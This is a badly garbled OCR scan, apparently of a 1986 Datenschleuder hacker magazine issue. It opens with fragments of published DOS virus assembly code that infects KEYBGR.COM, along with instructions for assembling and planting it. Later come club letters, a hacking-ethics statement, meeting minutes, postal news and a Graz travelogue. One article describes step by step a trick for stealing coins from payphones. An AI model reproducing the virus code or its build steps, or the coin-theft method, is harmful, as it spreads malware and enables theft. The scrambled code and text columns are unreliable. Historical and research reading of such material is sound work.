O AX, A R X rw-.JiOV ES,AX ^ASSUME ES:ABS0 ^iHW'tAX, E R R E T R Ruecksetzen des FehlerR O V CO E R RE T R 2 R O V CO * M9Y;:ML0RINT,AX MW:ailORIMTt2,BX EXttf'.:;POP D ; Rueckhole: i der gesicherten X y.'t.aolB'ter V3 D8 - P X O E S
-'"Assume D S ^ c f i N G , es:nothing

M O V A H , 10H SSV INT 21H

M V AX, O JP H

Jioraa 1 e Funkt 1 ansausfuchrung

Der Virus muss nun noch assembliert, gelinkt und dann in ein COM- File gewandelt werden. Mittels eines geeigneten Monitors werden nacheinander der Virus und der Tastaturtreiber geladen und mit 6549 Bytes als K E Y B G R . C O M zurckgeschrieben. Gegebenenfalls muss der durch den Treiber berschriebene Virusanfang restauriert werden, bevor das infizierte File auf Disk geschrieben wird. Das sollte fr einen gebten Assemblerprogrammierer kein Problem sein. Der vorliegende Virus zeichnet sich brigens durch einige Besonderheiten aus, die ihn als besonders geeignet fr die erste vollstndige Verffentlichung eines virussourcecodes erscheinen lassen: Er hat alle Eigenschaften eines Virus, ohne zerstrend zu wirken, wenngleich auch unbedarfte Anwender, die den Virus einfangen, an Hardwaredefekte denken mgen. Der Virus arbeitet im Verborgenen und wird nur dann aktiv, wenn ohnehin durch den Anwender auf Diskette/Platte zugegriffen wird, er fllt also nicht so leicht auf. Drittens kann man den Virus kontrollieren, weil er ja nur das Programm K E Y B G R . C O M befllt, und das auch nur, wenn dieses Programm mit der Uhrzeit 09.00.03 im Directory steht. Dieser Umstand fhrte in der Redaktion zu argen Schwierigkeiten, denn fr den als Versuchskaninchen ausgesuchten Rechner gab es zunchst kein K E Y B G R . C O M , welches den Ansprchen des Virus gengt. Kurzum, es ist ein Virus, der voll funktionsfhig ist, aber wohl kaum grssere Verbreitung finden drfte. Die Virusaktivitt besteht darin, da bei jedem Tastendruck und Bilschirmausgabe eines Zeichens ein kurzes Rauschen ("Pchchch!") zu hren ist und der Benutzer an einen Hardwarefeh/er denken knnte.

: 2. Sprung Ins normale D S O R D A D8 'bfhg' NVL ACTIVE D C ; Nicht aktiv. B P E E D 0 ; Allererster Virus nicht aktiv ! RST B D ' A:' B F A E D 'XEYBCR CCM' NM B D 0 B VIRUS P D F R RC A A S M CS:C0DE, DS:NOTHING, EStNOTHING SU E PS A UH X PS C UH X PS D UH X M V AH,0 ; Prveie, ob mindestens 15 Min. O IN? IAH ; seit Initialisierung vergangen S B DX,TIMEO ; sind. U C P DX,16384 ; {16384 Ticks des Zeitgabers -IS Min. M JL 53 M V ACTIVE,1 7 Falls Ja, aktiviere Virus. O S3: P P D O X P P cx O PP A O X ; Diskettenzugriff ; aufgrund des C P AX,4BC0H ; D S Kommandos M O JE $1 ; "Programm laden und ausfuehren* ? EXIT1: J P D S E T R ; Nein : * Normal veiter M O V CO 51: P S E ; ES:BX * Pararaeterblock UH S P S B ; D5:DX * Dateiname UH X P S C ; Sichere Register, die noch UH S ; gebraucht P S D i werden fuer INT 21H (AH-4BH) UH X M V DI,DX O M V DRIVE,0 ; Setzen des Laufwerkes des O M V AL,DS:DI+1 ; auszufhrenden Programme O C P AL,':' M JNE 55 M V AL,DS:DI O S B AL, ' A ' - l U M V DRIVE,Al O $5: CID PS C UH S PP D O S X R AX,AX O M V ES,AX O ASSUME OSiCODZ, ES'.UBSO MOV AX/ERRORINT ; Iflnorleren aller Dlskatten-

IREt t flnfach alle Fehler Mv&liqtfvtleren... BftftK E D NP :i::f!:&I'SEASE P O F R RC A


TEST PRESET,\ JZ EXIT2 / TEST ACllVMt., JZ IXSfty ' - fXJX HOV XOR SHL SHL RCL RCL MOV f

73 73
"

S" to

ASSUME D S i N O T H I N C , ESi^yrHINC posh ax .-msmi...

PUSH CX t Dlese,:aQi;atr>Varden zerstoert

Sprecher .einschalten m * i (Bic g > 1K31 CV CX.3 ; SchlelitatthlAJf CX NOfSE

re
n

- Routine ; springen DISEASE E D NP D 'Dieter Pragrarem 1st ein sogenanntes VIRUS - Pro-' B D 'graan. Es hat, einmal aktiviert, die Kontrolle ueder' B D 'alle S/stemeinhelten und sogar ueber die von' B D 'Benutzer eingelegten Speicherungsmedien. Es kopiert' B D 'sich selbststaendlg in noch nicht infizierte Be' B D .'trlebssysteme und verbreitet sich so unkontrolliert.' B D 'Das der Virus In diesem Fall keine Benutzerprogranme' B D 'zerstoert oder Speichernedlen loescht, 1st nur ein' B D 'philantroplscher 2ug des Authors B ' 0RS 1C2AH VIRUSENDE LABEL BYTE Virwci7.dstoxi2711861010
C0D ENDS END

OR AL,AH OUT 61H,A v LOOP NOISE AND A L , O F C H tfcUfcirptflotier ausschalten OR AL,1 O U T 61H.AL EXIT2: POP CX POP AX in die normale VIDEO JMP VIDEOVECTOR

and AKi?--i5581ts des ruE)cg9koppelten IN AL, frl:?|i>schleberesist AND AL.raBm' LauCJQei>er rauscht . . .

AL/RNQVAL ! A L , (UJVAL+3 , i A L , * / $ e n e r i e ) W ^IJSCHEN Al,,* J $ WC Sta RNDVAL! f t WOfcil ^ R R N D V A L + ^ J j f / Ausgwfliritines b^li^bigen

ra
<r>

Datenschleuder 5

An die Weltregierung Laserbriefe Mit welchen Absichten wir dieses kleine aber feine Kseblttchen herstellen, und da dies nicht zu unserer Privatbelung geschieht, ist in dem Artikel Thema Hacken" ausfhrlicher beschrieben; siehe dort. Im brigen: Willkommen an Bord. Captain Chaos begrt sie und wnscht einen angenehmen Flug nach Digitalien. Bitte abzuschnallen und das Rauchen fortzusetzen, wir booten in Krze. Und da wir grade bei Piloten sind, noch ein Wort zum vermeintlichen Personenkult. Der Vorwurf, da einem etwa Wau (bekannt aus Funk und Fernsehen) dauernd aus der Zeitung entgegenlacht, trifft nicht Wau, sondern die Medien. Journalisten arbeiten mit Schubladisierungen, und seit dem Btx-Coup haben sie Wau in der Lade mit der Aufschrift Computer & Aberwitz". Dort sitzt er nun, bzw. jener Teil seiner Seele, der in der Medienlandschaft Image" heit. Und wenn irgendwo wieder ein armes schwaches Elektronengehirn in Ohnmacht gefallen ist, ziehen die Journalisten die Lade auf, zappklapp, und bei Wau beginnt das Telefon zu rauchen, so einfach ist das. Aus diesem Grund lassen sich beispielsweise Stammesangehrige der Massai (Ostafrika) nicht fotografieren (nicht wegen Wau, sondern wegen dem gefangenen Image). Dieser Effekt potenziert sich dann nach dem Motto Leute versammeln sich dort, wo sich schon Leute versammelt haben", d.h. durch die Berichterstattung kriegen nicht nur immer mehr Leser, sondern natrlich auch immer mehr~Journalisten Wau in die Lade. Grade fr ein so inhomogenes Sortiment von Zeitgenossen wie es Computerfreaks darstellen, ist es doch von entscheidender Wichtigkeit, ber Sprecher zu verfgen, die eine weit gestreute Aufmerksamkeit finden und das Kunststck zuwege bringen, die gemeinsame Hackerphilosophie aktuell auf den Punkt zu bringen und gleichzeitig auf eine auch fr Nichtfreaks verstndliche Weise EDVkritische Rauchsignale aus dem Maschinenland abzugeben. Das kann nicht jeder. Wer sich in der Medienprsenz der Computersubkultur ein demokratisches Modell, etwa nach dem grnen Rotationsprinzip, wnscht, dem mu man zu bedenken geben, da ein soziokybernetisches Infotop (langsam nochmal lesen) wie der C C C sich nicht wie ein Gesangsverein vor einer Fernsehkamera zusammenschieben lt. Und nicht an Dich gerichtet, Volker, aber an jene, die vielleicht ein bichen eiferschtig auf das Wau-Image sind: Wer meint, da es der reine Eitelkeitsgenu ist, wenn man sich alle acht Wochen im SPIEGEL bewundern kann, der hat sich krftig in den Finger geschnitten. Im ffentlichen Interesse zu stehen, zumal wenn es dabei bisweilen um Aktionen am Rande der Legalitt geht, erweckt u.a. auch rasch die Aufmerksamkeit behrdlicher Stellen, die einem fortan von Amts wegen ganz empfindlich im Privatleben herumrsseln. Fr den Groteil der Bevlkerung waren Hacken und Datenakrobatik vor noch nicht allzu langer Zeit genauso obskure Angelegenheiten wie Flechtenkunde oder gyptologie. Von daher betrachtet war die HaSpa/Btx-Geschichte fr uns alle sowas wie die spektakulre ffnung der Grabkammer des Tutenchamun. Statt uns in Kleingeisterei zu zernrgeln, sollten wir die Goldmaske Image" pflegen, der es mit zu verdanken ist, da wir unsere Grabungen in den dotierten Siliziumplttchen fortfhren knnen, ohne umgehend im Verlie zu landen. Nobody is Plusquamperfekt. Und grade wer sich eingehender mit Medien und Kommunikationstechnologie befat, wird gut wissen, da zwischen der Person Wau (Herr Wau aus Holland bitte zum Informationsschalter") und dem Image Wau ein wichtiger und vor allem wirklichkeitsmchtiger Unterschied besteht. In eine Bierkiste passen etwa acht SpaceShuttles, und das World Trade Center ist zirka so hoch wie eine Packung Butterkeks: Das sind die Dimensionen der Wirklichkeit, wie sie beispielsweise das Fernsehen zeigt. Im brigen sind wir dankbar fr jeden, der uns bei der Ausbung unserer avantgardistischen und elitren Beschftigungen, nmlich bei den verlustreichen Gefechten im Papierkrieg, beim Kaffeekochen, Sortieren, Mllrunterbringen, Interviewsgeben und 1Million-kleine-Dinge-erledigen tatkrftig untersttzt. Lieber 1000 subtile Crews, die beim Eintten helfen, als noch eine eingegangene Zeitung mehr. Und nun das Wetter. Ls blofeld

Liebe Leute vom CCC, so Herbst/Ende letzten Jahres hatte ich bei euch ) Hackerbibel Teil I zu 33.33 und 64 Kleber Achtung Abhrgefahr" A4 bestellt. Daraufhin tat sich ne Weile gar nix und ich hatte die Bestellung eigentlich auch schon abgeschrieben, bis ihr pltzlich am 4.4.86 den damals beigefgten Scheck eingelst habt. Seitdem ist aberauch nix mehr passiert. Es wre ganz nett von euch, wenn ihr schon den Scheck einlst und mein armes Konto berzieht, da ihr mir auch was schickt, denn jetzt htte ich auch echt wieder Lust auf das Buch. Wenn ihr die Kleber nicht mehr findet, packt halt ne andere nette Sache 'rein. Olc?? PS: Wit ihr, was mich an euch nervt? Ihr seid so schweine-elitr. Mu doch echt nicht sein. Ist doch nichts dabei, aus ein paar ICs witzige Sachen zu bauen und was Feines, Subtiles mit zu machen. Da braucht man doch keine Avantgarde-Crew a la CCC. Sowas ist doch Scheie und luft unseren eigenen Zielen'zuwider! Auch der Personenkult a la Wau ist doch zum Kotzen! Lieber 1000 subtile DF-Crews in der Nacht, als noch eine Elite mehr. Volker Ernst

THEMA HACKEN
Ein Statement Der Chaos Computer Club gilt in der ffentlichkeit als eine Art Robin Data, vergleichbar mit Greenpeace, Robin Wood und anderen. Spektakulre Aktionen, wie beispielsweise der Btx-Coup, demonstrative Manipulationen mit Geldautomaten oder die jetzt anstehende Diskussion ber Computer-Viren, werden als nachvollziehbare Demonstrationen ber Hintergrnde im Umgang mit der Technik verstanden. Der CCC hat damit eine aufklrerische Rolle fr den bewuten Umgang mit Datenmaschinen bernommen. So schreibt Walter Volpert in seinem Buch Zauberlehrlinge - die gefhrliche Liebe zum Computer", die neuen Hacker" seien interessant, weil sie als Computer-Enthusiasten den Mythos der unangreifbaren Maschine zerstren knnen. Durch dieses Image in der ffentlichkeit, hat sich der CCC in den letzten Jahren einen Freiraum erkmpft, in dem unter gewissen Voraussetzungen Hacks mglich sind, die Einzelpersonen in arge Schwierigkeiten bringen wrden. Zunehmend versuchen nun Einzelne im CCC-Fahrwassermitzuschwimmen, indem sie ihre privaten Aktionen ohne Rcksprache mit dem Club als CCC-Aktion darstellen. Dies hat schon in der Vergangenheit eine Reihe von Problemen aufgeworfen. Inzwischen wird fr fast jede Aktion in der Bundesrepublik eine Stellungnahme vom CCC erwartet, wobei der CCC ber die Hintergrnde der bekanntgewordenen Aktionen oftmals nicht informiert wurde. Gleichzeitig besteht wegen der gesellschaftlichen Aufgabe des CCC die Notwendigkeit, einer Kriminalisierung von Hackern entgegenzuwirken. Vor diesem Hintergrund kann der CCC ohne Rcksprache nur unter erschwerten Bedingungen Untersttzung leisten. Rcksprache heit in dem Zusammenhang, da rechtliche Konsequenzen angesprochen werden sollten, um im Rahmen juristischer und journalistischer Mglichkeiten eine Kriminalisierung zu verhindern. Dazu sollte sich eine Gruppe zusammenfinden, die Kriterien entwickelt, die als Orientierungshilfen gelten knnen. Diese Gruppe htte unter anderem die Aufgabe, sich in die geltende Gesetzgebung einzuarbeiten, um kompetent argumentieren zu knnen. Darber hinaus ist zu fragen, ob sich der CCC weiterhin als Deutschlands Hackerzentrale" mit Personenkult entwickeln kann und vor allem was die einzelnen Mitglieder tun knnen, um diese allgemein kritisierte Situation zu berwinden. jwi Datenschleuder 7

18 A(XTVO%ADp
Mitgliederversammlung des CCC e.V. om 8.11.1986 Die 1. ausserordentliche Mitgliederversammlung beschloss am 8.11.86 zwei Punkte, die sich wesentlich fr unsere Mitglieder auswirken werden : Zum ersten, die nderung der Vereinssatzung. Durch die Ablehnung der Gemeinntzigkeit aufgrund der Beurteilung, da Hacken" keinen gemeinntziger Zweck im Sinne der Abgabenordnung darstelle, wurde eine Umformulierung der Satzung ntig. Es wurde folgende Satzungsnderung beschlossen und zur Eintragung in das Vereinsregister eingereicht: Der Paragraph 2, Absatz 1, Punkt 7, bisheriger Wortlaut 'Hacken', wird gestrichen und durch die Formulierung 'Frderung des schpferisch-kritischen Umgangs mit Technologie' ersetzt. Zum Zweiten der weitere Betrieb des Chaos Communication Center: Der Vorstand des Clubs erluterte die Situation des Chaos Communication Center auf dem INFEX-System. Die dort gemieteten Kapazitten werden derzeit nur zu 30 Prozent genutzt. Der Zulauf ist erheblich geringer als erwartet. Die Mitgliederversammlung beschloss, die Clubarbeit auf die CLINCH-Box zu verlagern, auerdem aber die Teilnahmemglichkelten auf dem Infex-System (soweit dies finanzierbar ist) fr interessierte Mitglieder weiterhin anzubieten. Zur praktischen Handhabung dieser nderung siehe Artikel Wo ist der CCC?" LS23

Die CCC-Fachgruppe Weltregierung meint dazu: Zum einen: Wir sind von Zeit zu Zeit schlicht berfordert, was das Erledigen von Bestellungen angeht. Einfach, weil es an Zeit und Leuten mangelt, die verantwortlich mitmachen. Im allgemeinen kriegen wir das aber zusammen mit den Bestellern in den Griff, ohne da der Gerichtsvollzieher erscheinen mu. Don't panic. Es luft nicht ganz so glatt wie bei Quelle, wofr wir um Nachsicht bitten und Besserung nicht versprechen knnen. In bestimmten Dingen ist der CCC aber trotzdem, so hoffen wir, die bessere Quelle. Lieber Volker, Du solltest uns wirklich mal besuchen kommen (z.B. zum Congress), wenn Du den Eindruck hast, da wir ein elitrer Haufen sind. Heiterkeit wird in Dein Herz einkehren, wenn Du die Realitt siehst. Der CCC Hamburg hnelt weniger einer Elite, die sich ja auch durch straffes, diszipliniertes Funktionieren hervortun mte, als vielmehr einem rechnergesttzten Flohzirkus. Dieser Flohzirkus zeigt rapide Auflsungserscheinungen, wenn mal wieder Briefcouverts zugeklebt werden mten oder so, was u.a. zu den elastischen Lieferzeiten fhrt. Und er erzeugt andererseits als eine Art Gruppendynamo auch jene wunderliche Art von (technischen und politischen) Geistesblitzen, die in den letzten Jahren berall dort aufleuchten, wo sich Leute trickreich, spielerisch und kritisch mit elektronischer Datenverrgerung und Kommunikation auseinandersetzen: Bitpiloten wie Du und ich. Das, was wir alle machen, knnte man "Arbyte" nennen. Rumdsen im Informationszeitalter. Eine Bordzeitung hltst Du gerade in der Hand. r__i I
Datenschleuder 6

Strahlengefahr aus dem Telefon?


In ; der vergangenen Zeit huften sich in der Redaktion Anfragen von Personen, die ihren Fernsprecher zufllig im Radio empfangen knnen. Es sind nicht die typischen Filmszenen, in denen der Agent die Wanze durch Drehen am Radio entdeckt. Hier scheint es sich um ein serienmiges Merkmal der Postgerte zu handeln. Wiederholt konnten Fernsprecher mit eingebautem Gebhrenzhler auf der Freuenz von 405 Khz (zwischen Mittel- und Langerwelle) im Radio empfangen werden. Es scheint, als ob die Gebhrenzhler wie Sender wirken und, bedingt durch Toleranzen der verwendeten Bauteile, mehr oder weniger weit zu empfangen sind. Manchmal mu man das Telefon auf das Radio stellen, in anderen fllen empfngt man es im Auto-Radio. Bisher ist der Fernsprecher TAP 791-Gebanzl mehrfach aufgefallen. Leser, die im Besitz eines Empfngers sowie eines Fernsprechers mit Gebhrenzhler (vielleicht auch ohne) sind, sollten der Redaktion ihre Erfahrungen mitteilen. Auf dem Congress wird dieses Thema im Rahmen eines Workshops ber kompromittierende Abstrahlung behandelt. LS23

Eine Besitzanzeige erbrigt sich, wenn derartige Sendeanlagen vor dem 5. Januar 87 fr dauernd (nicht mit wenigen Handgriffen wieder einsetzbar) unbrauchbar gemacht oder einem Berechtigten berlassen werden. Nicht genug damit, da man abgehrt werden kann. Nach der neuen gesetzlichen Regelung mu man dafr mglicherweise auch noch Strafe bezahlen: Wird man ausspioniert, so werden einem dazu natrlich eine oder mehrere Wanzen (staatlich genehmigte nichtgenehmigte Sendeanlagen) in die Wohnung gesetzt. Schon der Besitz derselben ist nun jedoch strafbar. M a n wei zwar nichts von dem Besitz, aber Unwissen schtzt ja bekanntlich vor Strafe nicht. LS23

Gummiertes Fest
Wie in jedem Jahr laufen Weihnachtswunschbriefe aus allen Teilen der Bundesrepublik in 2167 Himmelpforten ein. In einer Gemeinschaftsaktion des Postamtes, der Gemeinde Himmelpforten und des Weinachtsmanns werden alle eingehenden Sendun gen mit einem Schreiben beantwortet. Oh,Oh,Oh! Mir wird schon schwummerig, wenn ich die groen Stapel Wunschbriefe hinter mir sehe", sthnt dort der Weinachtsmann. Ohne die Hilfe der Erdenpost wrden er und das Christkind verzweifeln. Zum Glck hat er tchtige und fleiige Helfer. So bleibt ihm nur noch, die Briefmarken auf den Antwortbriefen mit einem (s. Abbildung) weihnachtlichen Stempel zu entwerten. LS23

MNZFERNSPRECHERTRICKS
Ein neuer Gauner-Trick macht der Bundespost zu schaffen, berichtete der SPIEGEL in der Nummer 47. Mit prparierten Fnf- Mark-Stcken plndern Mnzdiebe ffentliche Fernsprecher. Der neueste Mnztrick gehrt nach Einschtzung von Postexperten zum bislang "cleversten und eintrglichsten Trick" von Gaunern, die sich auf Telefonzellen spezialisiert haben. Der Trick ist so simpel wie erfolgreich: Ein FnfMark-Stck wird am Rand an zwei Stellen leicht eingekerbt und an einem Faden - bevorzugt reifestes, aber feines Blumenband - gebunden. Die prparierte Mnze wird dann wie gewhnliches Geld in den Mnzkanal geworfen, aber nach einer bestimmten Zahl von Zentimetern durch den Faden gestoppt, der zuvor hinter dem Geldschlitz festgedrckt wurde vorzugsweise mit Kaugummi." Die Manipulation ist von aussen nur schwer erkennbar. Das Geldstck baumelt kurz vor der Lichtschranke, die jeden Geldeinwurf registriert. Alle folgend eingeworfenen Fnfer(maximal 10) bleiben.dort hngen und knnen durch lsen des Fadens abkassiert werden. Der nahezu als betrugssicher geltende Telephonautomat Typ 21 der bundesweit in 53 000 Fnf-MarkFernsprechern eingebaut ist, wird laut FTZ nicht innerhalb von zwei Jahren ersetzt werden knnen. Um den Mnzdieben auf die Spur zu kommen, setzen Post und Polizei in etlichen Grostdten mit migem Erfolg bereits Sondertrupps ein. Die Redaktion empfiehlt Datenreisenden, die in ffentlichen Fernsprechern derartige Manipulationen aufdecken, sofort den Strungsdienst der Post anzurufen. Dem dann anreisenden Strdienst ist die Manipulation anzuzeigen, sowie der Geldbetrag als Fundsache/Eigeneinwurf quittieren zu lassen. Solches Vorgehen befreit vom Tatverdacht, der durch eventuelle Wahrnehmung des Fundes unterstellt werden knnte. Bei Komplikationen bittet die Redaktion um Information. LS23

Neue Gebhren
Datex-P wird leuer

'

SetoaMrtwliu

Staatliches Wanzenmonopol eingerichtet


Post weist auf Anmeldetermin nichtgenehmigtcr Sendcanlagen hin.

G r n l i c h e Computerstudie

Erste W h l p e r i o d e abgeschlossen

Das seit dem 5. Juli 86 geltende Gesetz zur Verhinderung des Mibrauchs von Sendeanlagen" hat, laut Aussage der Post, den verstrkten Schutz der Intimund Geheimsphre der Brger sowie des Fernmeldeverkehrs zum Ziel. Dieses Gesetz macht bereits den Erwerb, den Besitz und das berlassen einer Sendefunkanlage (Sender oder Sender/Empfnger) von einer fernmelderechtlichen Genehmigung abhngig. Das Betreiben nichtgenehmigter Sendeanlagen, die im Einzelhandel angeboten werden, war zwar auch vor dem 5. Juli verboten, der bloe Besitz hingegen gestattet. Die sich noch im Besitz von Personen und Firmen befindlichen nicht zugelassenen Gerte, mssen bis sptestens 5. Januar den FunkstrmeBstellen der Fernmeldemter gemeldet werden. Auch nach der Besttigung (unbedingt abfordern!) der Besitzanzeige durch die Post drfen die Gerte nicht mit einer Stromversorgung, also Netz oder Batterie, verbunden und in Betrieb genommen werden.

Die Einfhrung der Computertechnik gestaltet sich fr die Grnen im Bundestag so schwer wie fr andere der Ausstieg aus der Atomindustrie. Fr beide geht es an die Strukturen", beginnt eine Studie ber die Computerisierung der Fraktion" (PARLAKOM), die gemeinsam von C C C / A P O C (Arbeitskreis politischer Computereinsatz) und deren Freundinnen als Hilfestellung auf dem Weg zu einer fundierten Postpolitik erstellt wurde. Hisrisch geht es seit Herrschafts Zeiten um die Kontrolle des fortgeschrittensten Mediums. Politisch um informationelle Selbstbestimmung. Kulturell um die Entwicklung von Netzwerken, netzgemem Denken und Handeln. Wirtschaftlich mu eine dezentrale Netztechnologie entwickelt werden." Die endgltige Genehmigung zur Verffentlichung der Studie von gut 50 Seiten Umfang wird derzeit von der Bundestagsverwaltung bearbeitet. Der Verkaufspreis wird zwischen D M 6,66 und 7,50 liegen. Ask Your Local Dealer eise CCC. Gosub Next Artikel. Is5

Der Verwaltungsrat der Deutschen Bundespost hat der von Rostminister Schwarz-Schilling vorgelegten 29. Verordnung zur nderung der Fernmeldeordnung zugestimmt. Diese Verordnung enthlt neben Gebhrensenkungen von im Saldo 330 Millionen D M jhrlich.. ,",so beginnt eine Presseerklrung der OberPostDirektion Hamburg. Neben den Gebhrensenkungen fr Tastentelefone (die werden fr intelligente Netze der Post gebraucht und mten sowieso ausgetauscht werden) versteckt sich eine entscheidende nderung im Datex-P-Verkehr. Fr den Zugang aus dem ffentlichen Fernsprechnetz zu Endeinrichtungen im ffentlichen Datex-PNetz werden die entfernungsabhngigen Zugangsgebhren am 1. April 1987 (scherzlos) durch entfernungsunabhngige Gebhren ersetzt. Dadurch werden Standortnachteile ausgeglichen." Die Pressestelle des Rostministeriums erluterte die Manahme: Das Datex-P-Netz htte nur einen kleinen Teilnehmerkreis, der ber das Fernsprechnetz zugreift. Die Gebhrennderung wrde nur wenige betreffen und den meisten Vorteile verschaffen. Geplant ist ein Zeittakt von 50 Sekunden am Tag und 75 in der Nacht. Fr Nutzer aus Orten, in denen bisher Datex-P zum Ortstarif erreichbar ist, entstehen ber neunmal so hohe Fernsprechgebhren. Nutzer aus der Fernebene sparen nur wenig und zahlen im Nachttarif oft drauf. Bildschirmtext, die Wunschmaschine" (so das Bundesrostministerium) frs Volk ist bundesweit zum Orts- oder Nahtarif zu erreichen. Die Post frdert den falschen Dienst. Btx ist ein System, bei dem Zentrale und Endgerte nicht sonderlich intelligent sind. ber die zukunftstrchtigen Datennetze wie Datex dagegen lassen sich relativ einfach beliebig viele intelligente Systeme koppeln. Intelligente Netze und Kommunikationssysteme auf der Datex-P bertragungsebene bleiben durch diese Gebhrenstruktur weiterhin vielen aus Kostengriinden verschlossen. Is23

Datenschleuder 9

der Ungleichungsformel ER-AS=0 verhielten. In Graz erhellten sich die Siraen wieder, doch das beleuchtete unsere Vorstellung vom genauen Ziel nur unwesentlich. Niehl zuletzt deshalb sah sich unser Amateurfunker gentigt, seinesgleichen in der Fremde zu suchen. Glcklicherweise gibt es auch in Graz einige wenige amateurfunkende Sptaufsteher. Amateurfunker sind eine ganz seltsame Sorte Mensch. Erst bewerfen sie sich eifrig mit Q-Gruppen und Rufzeichen, um danach vergessen zu haben, was sie eigentlich sagen wollten. Da braucht selbst BettNett, obwohl von HAL, weniger Overhead. Wir fragten also die freundlichen Funker, wo's denn zur TU gehe. Sofort entbrannte eine heie Diskussion zwischen den Lokalamateuren, wo wir uns wohl befnden und was wohl der geeignetste Weg dorthin wre. Unserem Mobilfunker gelang es nichtseinen Ein-Watt-Phallus dazwischenzuhauen, und so begab es sich, da wir uns schon lngst nicht mehr an der spekulativ ermittelten Stelle befanden. Unser Mobilfunker hatte auch nicht gerade die Gabe, sich besonders przise auszudrcken. Er gab den Lokalfunker so aussagekrftige Hinweise wie etwa Auf der rechten Straenseite sehe ich ein Vorfahrtschild" oder Direkt hinter uns fhrt ein roter Kfer, und zwar genau in Decklinie mit einem

mittelgroen Haus". Die Antwort (nach eingehender Diskussion natrlich) fiel etwa hnlich informativ aus: Wennlhr
die Straenbahnschienen seht, mt ihr sofort hatb-rechis

abbiegen!". Wren wirdieserAuskunftgefolgl, htten wir uns wohl in Wien wiedergefunden, da in sterreich bekanntlich alle Wege nach Wien fhren - frher oder spter. Das Gelnde der Uni war im Grunde unverfehlbar, da Graz zu einem ungewhnlich hohen Prozentsatz aus Universitt besteht, so verfehlten auch wir es nicht Wir fuhren die Auffahrt hinauf zum groen Portal. An dem Tor war ein Zettel angeheftet auf dem in Caps-Lock drei riesige C's zu sehen waren. Der inliegende Text wies aus, da der Organisator im Restaurant Lauflee" zu finden sei. Es kostete uns nur zwanzig Minuten, das zwei Straen weiter gelegene Restaurant aufzusuchen, welches ohne jeden Zweifel in der Lage war, uns fr jeglichen Mangel des Zielgebietes zu entschdigen. Das beschriebene Restaurant ist eine gastronomische Oase am Rande des Universums. Man kann bequem dem Weltuntergang entgegensehen. Die ersteNacht,die nun ber dieSladt hereingebrochen war, verbrachten wir in unterschiedlich komfortabel ausgestatteten Unterknften. Zwei ppl. bei einem Architekturpuristen, derLetzteineiner Mdchen-WG. Ich selbst schlo mich ersterer Mglichkeit an, da diese gesicherte Nachtruhe zu Chaos-Dienstreise nach Graz versprechen schien. Der folgende Tag meldete sich vorsichtig mit einem laserartigen Sonnenstrahl von hchstens zwei Mllliwatt Leistung und einem vorzglichen, unverlngerten trEines Tages wurde uns durch den Besuch des Vorsitzenden der kischen Kaffee an. An der TU standen zwar ein paar VAXen Studentenschaft der Technischen Universitt Graz bekannt, im Glaskasten, ein Telefon zufinden,jedoch, war ein ausda die TU Graz anllich ihres 175-jhrigen Bestehens eine sichtsloses Unterfangen. Der freundliche Organisator war Veranstaltung mit dem Titel TECHNIK FEIERN" geplant stets bereit, uns jede nur erdenkliche Hilfestellung angedeihen hatte, da es ja zu langweilig wre, stndig maschinenstr- zu lassen, so machte er sich auf den Weg ein Telefon zu merisch auf die Technik zu schimpfen, und man ja nun endlich besorgen. Ich mu gestehen, da ich ein wenig entsetzt dreineinmal einen Kontrast dazu schaffen msse. Das Schaffen geschaut haben mu, als er zurckkehrte. Er berreichte mir eines Kontrastes ist den Organisatoren zumindest mit ihrem freudestrahlend einen Fernsprechapparat Hier hast du ein Ankndigungsplakat gelungen: Rote Schrift auf grnem Telefon ", sagte er in erhebender Tonlage. Es gelang uns, ihm Grund. Wir bekamen netterweise eines dieser kontrastreichen zu erklren, da Wasserhhne, um Wasser zu speien, an eine Plakate berreicht, worauf zu lesen war, da der Chaos- Wasserleitung angeschlossen werden mssen, und es sich mit Computer-CIub aus Hamburg hei der Veranstaltung mitwir- Telefonen nicht wesentlich anders verhalte, mit dem einzigen, ken wrde. Der Veranstalter teilte uns mit, da man nunmehr feinen Unterschied, da in diesem speziellen Falle eine Wasnichl mehr auf uns verachten knne, da unser Vortrag bereits serleitung nicht helfe. Dieses Problem sollte sich erst spter, durch Verbalpropaganda als der Hammei" angekndigt wor- ca. 5 Minuten vor Beginn des Vortrags, klren. Ichriefdann den sei. Wir beschlossen, uns den Tatsachen zu fgen und uns ersteinmal die Post an, um die Telefonnummer fr den Grazer fr den Tag X" in Kln zu verabreden, da dort etwa zeitgleich Datex-P Vemnittlungsrechner zu erfragen. Man informierte die Orgatechnik- Messe stattfand, die ohnehin besucht werden mich postwendend, da der Telefonzugang fr Datex-P gemute. hnlich geschah es auch wenig spter in Kln. Wir plant, ber den Beginn der Arbeiten jedoch noch nichts betrafen uns nach einigen olgatechnischen Problemen tatsch- kannt sei. Ich mute erneut schlucken. Das also war der Grund lich auf der Messe und begaben uns nach dem einen oder fr die unangemessen schwache Vertretung sterreichs in der anderen, nebenbei bemerkt, recht erfrischenden Klsch und Networker Crew. Glcklicherweise hatte eine der Uni-V AXen einergutbrgerlichen Mahlzeit mit etwa zwanzig Hackern aus einen Datex-PIO Hauptanschlu und die SysOps der VAXen rund vier Bundeslndern, in Clinch's Chaos-Mobil, welches waren SEHR KOOPERATIV (!!!). Leider hat das Packet den Antritt der Reise schon dadurch erheblich vereinfachte, Swilching Interface (PSI) unter dem dort laufenden VMS 4.1 da es sofort ansprang.

ENTWICKLUNGSHILFE

noch eine kleine Macke, so da ich unabsichtlich die DECNET-links zwischen den Nodes RECH: und STG::" - unwiderruflich bis zum nchsten re-boot beider Maschinen - in den Wald geschickt hatte. Wie bereits erwhnt, kam in letzter Sekunde die rettende Idee. Wir schraubten das einzige voll amtsberechtigte Vieiteltelefoii im Erdgescho auseinander, klebten die ungleichen Sprech- bzw. Hrkapseln mit denen eines Haustelefonanapparates zusammen und stellten einen Mann fr die Aufgabe des Whlens im Erdgescho ab. Im Hrsaal Sechs, in den die Veranstaltung verlegt worden war, da dort der einzige Terminalanschlu mglich war, gab es murphylogischerweise keinen Haustelefonanschlu. Generell war in Graz die technische Ausstattung fr eine technische Universitt eher drftig. So mute die Veranstaltung erneut umziehen - In die Aula, wie eingangs geplant Der Computer, der auch nur durch das Ausleihen einerCGA-Karte im wohl einzigen Compi-Shop von Graz dazu berredet werden konnte, auf dem Video-Beam sinvolle Zeichen abzubilden, sowie der Grobildprojektor selbst, mute mit vereinten Krften in den ersten Stock getragen werden, wo mein mitgebrachtes Schlabberphon an einem Haustelefonhrer lauerte. Der im Erdgescho abgestellte Mann whlte den hamburger PD an und siehe da, der hatte nichts dagegen, uns die groe weite 